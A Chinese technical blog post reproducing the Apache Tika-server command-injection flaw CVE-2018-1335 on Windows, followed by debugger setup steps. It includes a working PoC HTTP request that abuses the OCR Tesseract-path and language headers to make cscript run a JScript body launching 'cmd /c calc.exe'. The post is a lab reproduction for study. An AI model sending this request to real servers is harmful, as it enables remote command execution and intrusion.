Apache Tika-server RCE(CVE-2018-1335)

最新推荐文章于 2024-05-14 09:32:37 发布
最新推荐文章于 2024-05-14 09:32:37 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: java Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/88532439
版权
Web 同时被 2 个专栏收录
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

PoC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335

PUT /meta HTTP/1.1
Host: cqq.com:9998
Connection: close
User-Agent: python-requests/2.19.1
X-Tika-OCRTesseractPath: "cscript"
Content-type: image/jp2
Expect: 100-continue
X-Tika-OCRLanguage: //E:Jscript
Content-Length: 98

var oShell = WScript.CreateObject("WScript.Shell");
	var oExec = oShell.Exec('cmd /c calc.exe');

分析:https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/

只在Windows上复现。
< 1.18 server
下载:https://archive.apache.org/dist/tika/tika-server-1.17.jar
启动:

java -jar tika-server-1.17.jar

在这里插入图片描述

调试

照例按照之前远程调试的经验,设置参数启动tika-server:

$ java -Xrunjdwp:transport=dt_socket,suspend=n,server=y,address=12346 -jar ./target/tika-server-1.17.jar  -h 192.168.170.139

在这里插入图片描述
如图,当Idea中点击调试按钮之后就会连接到该端口。
然后在intelli Idea引入server目录,以及parser目录(因为会用到),不然调试的时候跟不到那个源码部分。

然后在右下角允许maven同步,需要下载一些依赖包,方便调试源码。
在这里插入图片描述

caiqiiqi
关注
专栏目录
docker-tikaserver:Apache Tika Server作为Docker映像
05-02
码头工人 此存储库包含Dockerfile,用于创建Docker映像,该映像包含使用Java 14在端口9998上运行Apache Tika 1.26 Server的最新Ubuntu。 开箱即用的容器还包括GDAL和Tesseract OCR解析器的依赖项。 为了在显示功能和图像大小之间取得平衡,该文件当前安装了以下语言的语言包: 英语 法语 德语 义大利文 西班牙语。 要安装更多语言,只需更新apt-get命令以包含包含所需语言的软件包,或使用ADD命令包含您自己的自定义软件包。 用法 首先,您需要从Dockerhub中删除构建,可以通过调用以下操作来完成: docker pull logicalspark/docker-tikaserver 然后,要运行该容器,请执行以下命令: docker run -d -p 9998:9998 logicalspark/docker-t
CVE-2018-1335的重现(附POC)
小亮的博客
03-19 1547
这是一枚Apache Tika中的命令注入 我这里靶机是win10,攻击机是win10的linux子系统。关于这个环境,请看我的另一篇博文这里。所以这里我的IP都是localhost 在靶机上下载漏洞环境: wget https://archive.apache.org/dist/tika/tika-server-1.17.jar 在靶机上运行漏洞环境: java -jar tika-s...
Apache Tika-server 命令执行漏洞(CVE-2018-1335)
weixin_44047654的博客
04-12 684
Apache Tika-server 命令执行漏洞(CVE-2018-1335)
Running Apache Tika in Server Mode
lionzl的专栏
06-19 1225
Running Apache Tika in Server Mode We are using Apache Tika for plain-text extraction of pdf files. Tika is doing a good job here except for the fact that it takes quite long to get results. As an
TIKA Server笔记
Wind_white的博客
12-15 2460
TIKATika下载 server.jar http://tika.apache.org/download.html下载server版,需要java运行环境。注:JAVA9默认缺少server运行所需要的xml.bind包,需要另行解决,JAVA8无问题。 docker docker pull logicalspark/docker-tikaserver # only on initial down
tika-example:使用Apache Tika进行文件类型检测
05-10
在"tika-example"这个项目中,我们将深入探讨如何利用Apache Tika来检测文件类型,例如CSV和XML。 首先,Apache Tika的核心是TikaConfig,它包含了对各种解析器的配置。TikaConfig类提供了默认的配置,可以用来初始...
apache-tika-1.2-src.zip_ tika-app-1.2_java poi word_tika-app-1.2
09-14
在"apache-tika-1.2-src.zip"这个压缩包中,你将找到Tika的源代码,这对于理解其工作原理和进行自定义扩展非常有帮助。"tika-app-1.2"是Tika的可执行JAR文件,它集成了所有必需的依赖项,可以直接运行,用于处理和...
tika-python绑定到 Apache Tika REST 服务
05-27
tika-python 绑定到 Apache Tika REST 服务 Python binding to the Apache Tika REST services Apache Tika 库的 Python 端口,可使用 Tika REST 服务器使 Tika 可用。这使得 Apache Tika 可作为 Python 库使用,可...
tika-core-1.22.jar_tika_
10-04
Apache Tika本产品包括在以下位置开发的软件Apache软件基金会。版权所有1993-2010大学大气研究公司/ Unidata该软件包含源自UCAR / Unidata的NetCDF库的代码。Tika服务器组件使用CDDL许可的依赖项
apache-tika-0.1-incubating-src.tar.gz_垂直搜索引擎
09-21
"apache-tika-0.1-incubating-src.tar.gz"是Apache Tika项目的早期版本源代码包,发布于其在Apache孵化器期间。这个版本可能包含了一些基础功能和初步的框架,为后续版本的发展打下了基础。 Tika的主要功能包括: ...
Apache Tika】在各环境独立部署tika-server通过接口调用实现文档解析
dzt2630849356的博客
12-08 1540
Apache tikaApache开源的一个文档解析工具,曾经是的一个子项目,现已成为Apache顶级项目。Apache Tika可以解析和提取一千多种不同的文件类型(如PPT、XLS和PDF)的内容和格式,并且提供了多种使用方式,既可以使用图形化操作页面(tika-app),又可以独立部署(tika-server)通过接口调用,还可以引入到项目中使用
apache文件服务器搭建 hamapp,Apache Tika
weixin_28878185的博客
08-05 400
Tika now has a module for Deep Learning powered by theDL4J toolkit. The initial included model is for InceptionV3and so using this module, natively in Java, Tika can useDeep learning for metadata/text...
[EXP]Apache Tika-server < 1.18 - Command Injection
weixin_30307267的博客
03-14 154
###################################################################################################### #Description: This is a PoC for remote command execution in Apache Tika-server. ...
Tika是什么?如何安装Tika
zhu_yanjie的专栏
05-09 6717
最近在看lucene,昨天看到使用Tika提取文本,把安装过程记录下来,方便以后使用: 一句话解释Tika的作用:Tika是一个具有内置解析器用于处理各种文档类型的程序框架。该框架公布了标准的API供应用程序调用并完成从文档中提取文本和元数据,内置解析器会在后台通过外部程序提供的API与之交互。这使得你的应用程序能够针对不同的文档类型使用相同的API。当程序需要从文档中提取文本时,Tika会找到
TIKA环境配置
weixin_30549175的博客
08-07 335
本章将指导完成设置Apache Tika在Windows和Linux的配置过程。用户管理是必要的,同时安装了Apache Tika。 系统要求 JDK Java SE 2 JDK 1.6 或以上 内存 1 GB RAM (推荐) 硬盘空间 无最小要求 操作系统版本 Windows XP 或以上, Linux 第1步:验证安装Jav...
tika的框架,功能
xqk709008281的博客
11-26 846
Tika是什么?       Tika是一个内容抽取的工具集合。它集成了POI, Pdfbox 并且为文本抽取工作提供了一个统一的界面。其次,Tika也提供了便利的扩展API,用来丰富其对第三方文件格式的支持。 Apache Tika 可以自动检测各种文档(如word,ppt,xml,csv,ppt等)的类型并抽取文档的元数据和文本内容。Tika集成了现有的文档解析库,并提供统一的接口,使针对
maven依赖包总结
helloGirl
03-03 832
1. swagger:后端代码api <!-- swagger --> <dependency> <groupId>io.springfox</groupId> <artifactId>springfox-swagger-ui</artifactId> <version>2.5.0&l...
探秘Apache Tika的Python接口——tika-python
最新发布
gitblog_00003的博客
05-14 456
探秘Apache Tika的Python接口——tika-python tika-pythonTika-Python is a Python binding to the Apache Tika™ REST services allowing Tika to be called natively in the Python community.项目地址:https://gitcode.com/g...
修改jar 注入_Apache Tika命令注入漏洞挖掘
weixin_39846664的博客
11-20 272
介绍这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤。CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335。由于Apache Tika是开源的,我能够通过分析Apache Tika代码来确定问题。虽然命令注入漏洞通常很简单,但要实现完整的远程代码或命令执行需要克服一些障碍。这是由于Java处理执行操作系统命令的方式...
java -jar tika-app.jar --text
02-06
这条命令是用来在命令行中运行Apache Tika工具的。通过运行java -jar tika-app.jar --text命令,可以使用Tika工具来提取文档中的文本内容。Tika是一个用于提取文档内容的开源工具,可以处理各种类型的文档,例如PDF、Word、Excel等。当我们在命令行中输入这条命令时,Tika会被加载并执行,然后会对指定的文档进行处理,最终将文档中的文本内容提取出来,显示在命令行中。这对于需要批量处理文档内容或者需要对文档进行分析的场景非常有用。通过这条命令,我们可以快速方便地获取到文档的文本内容,而不需要打开文档进行手动复制粘贴。总之,java -jar tika-app.jar --text命令是一个非常方便的工具,可以帮助我们在命令行中提取文档内容,提高工作效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值